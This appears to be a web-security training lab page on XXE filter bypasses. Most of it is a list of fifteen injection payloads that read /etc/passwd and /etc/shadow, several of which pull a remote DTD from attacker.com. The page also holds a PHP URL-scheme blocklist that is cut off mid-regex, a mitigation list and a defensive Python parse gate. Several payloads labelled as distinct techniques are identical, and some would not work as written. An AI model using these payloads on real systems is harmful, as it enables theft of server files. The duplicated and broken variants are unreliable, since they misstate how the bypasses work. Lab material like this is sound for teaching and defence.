Lab 4: Advanced XXE Techniques

Advanced XXE bypass techniques against sophisticated filters

Difficulty: High

Lab Overview

This lab demonstrates advanced XXE bypass techniques against sophisticated security filters. The application implements multiple layers of protection but can still be bypassed using advanced obfuscation and encoding techniques.

Objective: Use advanced techniques to bypass sophisticated filters and achieve XXE exploitation.

Advanced Vulnerable Code
// Advanced security filters (can be bypassed)
function process_advanced_xxe($xml_input) {
    $dangerous_patterns = [
        'file://', 'http://', 'https://', 'ftp://', 'gopher://', 
        'ldap://', 'smb://', 'php://', 'data://', 'expect://'
    ];
    
    // Check for dangerous patterns
    foreach ($dangerous_patterns as $pattern) {
        if (stripos($xml_input, $pattern) !== false) {
            return "Dangerous pattern detected: " . $pattern;
        }
    }
    
    // Additional regex checks
    // Additional regex checks (the regex pattern and the remainder of the function are cut off in the page source)
    if (preg_match('/
Advanced XXE Tester

Advanced Filters

Multiple layers of protection:

  • Pattern Detection: Detects dangerous URL schemes
  • Regex Validation: Validates entity declarations
  • URL Scheme Filtering: Blocks common protocols
  • Advanced Pattern Matching: Complex regex patterns

Advanced Bypass Techniques

Try these advanced methods:

  • UTF-8 encoding - Unicode bypass
  • XML parameter entities - Parameter entity bypass
  • External DTD - External DTD bypass
  • Obfuscation - String obfuscation

Vulnerability Details
  • Type: Advanced XXE Techniques
  • Severity: Critical
  • Method: POST
  • Issue: Advanced filters can be bypassed

Advanced Techniques
  • Encoding: UTF-8, Unicode, Base64
  • Obfuscation: String manipulation
  • Parameter Entities: %entity declarations
  • External DTDs: Remote DTD inclusion

Advanced XXE Bypass Payloads

Use these advanced techniques to bypass sophisticated security filters. As rendered on this page, the UTF-8, Unicode, obfuscated URL scheme, mixed encoding and advanced obfuscation payloads show no visible difference from the plain file:// payload, and the tab and newline payload appears with plain spaces.

1. UTF-8 Encoding Bypass:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root><data>&xxe;</data></root>

2. Unicode Encoding Bypass:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root><data>&xxe;</data></root>

3. String Concatenation Bypass:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "f">
  <!ENTITY xxe2 SYSTEM "ile:///etc/passwd">
]>
<root><data>&xxe;&xxe2;</data></root>

4. Parameter Entity Bypass:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY xxe SYSTEM "data://text/plain;base64,%file;">
]>
<root><data>&xxe;</data></root>

5. External DTD Bypass:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root SYSTEM "http://attacker.com/evil.dtd">
<root><data>&xxe;</data></root>

evil.dtd content:
<!ENTITY xxe SYSTEM "file:///etc/passwd">

6. Blind XXE with External DTD:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
  %remote;
]>
<root><data>&xxe;</data></root>

evil.dtd content:
<!ENTITY xxe SYSTEM "file:///etc/passwd">

7. Obfuscated URL Schemes:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root><data>&xxe;</data></root>

8. Mixed Encoding Bypass:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root><data>&xxe;</data></root>

9. Case Variation Bypass:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY xxe SYSTEM "FILE:///etc/passwd"> ]>
<root><data>&xxe;</data></root>

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY xxe SYSTEM "File:///etc/passwd"> ]>
<root><data>&xxe;</data></root>

10. Whitespace Bypass:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY xxe SYSTEM " file:///etc/passwd "> ]>
<root><data>&xxe;</data></root>

11. Tab and Newline Bypass:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY xxe SYSTEM " file:///etc/passwd "> ]>
<root><data>&xxe;</data></root>

12. Multiple Entity Declarations:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
  %remote;
  %file;
]>
<root><data>&xxe;</data></root>

13. Nested Entity Declarations:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
  %remote;
]>
<root><data>&xxe;</data></root>

evil.dtd content:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY xxe SYSTEM "data://text/plain;base64,%file;">

14. Conditional Entity Declarations:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
  %remote;
]>
<root><data>&xxe;</data></root>

evil.dtd content:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY xxe SYSTEM "data://text/plain;base64,%file;">
<!ENTITY % file SYSTEM "file:///etc/shadow">

15. Advanced Obfuscation Techniques:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root><data>&xxe;</data></root>

Real-World Attack Scenarios

Mitigation Strategies

  • Disable external entity processing in XML parsers
  • Use whitelist-based validation for allowed XML schemas
  • Implement proper input validation and sanitization
  • Use secure XML parsing libraries
  • Regular security testing and vulnerability assessments
  • Monitor for unusual XML processing patterns
  • Implement Content Security Policy (CSP)
  • Use Web Application Firewall (WAF) to detect XXE attempts
  • Implement behavioral analysis to detect advanced attacks
  • Use proper file system permissions and access controls
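The first mitigation above, disabling external entity processing, is more robust than the lab's URL-scheme blocklist because every payload on this page needs a DOCTYPE to declare its entities. The following added example (mine, not the lab's code) is a parse gate built on Python's standard-library expat parser that refuses any DOCTYPE or external entity reference before it is processed; the function names and sample inputs are constructed.

```python
# Added example, not the lab's own code: rather than blocklisting URL schemes
# (bypassable, as the lab shows), refuse the DTD machinery that every XXE payload
# on this page relies on. Python standard library only; the names are mine.
import xml.parsers.expat as expat


class UnsafeXmlError(ValueError):
    """Untrusted XML carried a DOCTYPE or referenced an external entity."""


def parse_untrusted_xml(xml_text: str) -> dict:
    """Parse with DTD processing refused; return {element: text} for leaf elements."""
    parser = expat.ParserCreate()
    parser.buffer_text = True  # deliver each text node in a single callback
    result, stack = {}, []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires for internal subsets and external SYSTEM/PUBLIC DTDs alike, before
        # any entity declared there is processed.
        raise UnsafeXmlError(f"DOCTYPE '{name}' refused")

    def on_external_entity(context, base, sysid, pubid):
        return 0  # returning 0 makes expat abort with XML_ERROR_EXTERNAL_ENTITY_HANDLING

    def on_end(tag):
        text = "".join(stack.pop()[1])
        if text.strip():
            result[tag] = text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = lambda tag, attrs: stack.append((tag, []))
    parser.CharacterDataHandler = lambda data: stack[-1][1].append(data)
    parser.EndElementHandler = on_end
    parser.Parse(xml_text, True)  # ExpatError on malformed input or an undefined entity
    return result


def is_accepted(xml_text: str) -> bool:
    """True when the gate lets the document through, False when it refuses it."""
    try:
        parse_untrusted_xml(xml_text)
        return True
    except (UnsafeXmlError, expat.ExpatError):
        return False


# Constructed inputs: the lab's plain payload, its external-DTD variant, a benign document.
LAB_INTERNAL_DTD = ('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ '
                    '<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><root><data>&xxe;</data></root>')
LAB_EXTERNAL_DTD = '<!DOCTYPE root SYSTEM "http://attacker.com/evil.dtd"><root><data>&xxe;</data></root>'
BENIGN = '<root><data>hello</data></root>'
```

Because the refusal happens in the DOCTYPE callback, the case, whitespace and concatenation variants listed above are all rejected by the same check, with no scheme list to maintain.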